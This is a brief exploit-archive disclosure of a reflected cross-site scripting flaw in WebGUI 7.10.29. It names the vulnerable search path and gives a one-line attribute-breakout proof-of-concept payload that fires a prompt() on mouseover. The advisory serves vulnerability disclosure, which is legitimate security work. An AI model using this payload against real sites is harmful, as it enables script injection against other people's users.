WebGUI Cross site scripting vulnerability

Exploit Title: WebGUI 7.10.29 stable version Cross site scripting vulnerability 
Software Link: http://www.webgui.org/download
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 17-1-2015
Version: 7.10.29. Previous version maybe vulnerable also. 


Vulnerable area: http://localhost/style-underground/search

XSS PoC: 1" onmouseover=prompt(907460) bad="

Screenshot: 
Link: http://secupent.com/exploit/images/webgui-xss.png
Mirror: http://vulnerability.io/exploit/images/webgui-xss.png

Reference: http://secupent.com/exploit/WebGUI-7.10.29-XSS.txt


Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com,
 packetstormsecurity.com and all other exploit archives, hackers and security researchers.